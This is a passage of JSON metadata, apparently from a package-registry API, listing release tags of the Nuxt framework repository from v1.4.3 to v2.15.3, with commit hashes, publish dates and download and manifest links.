tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifest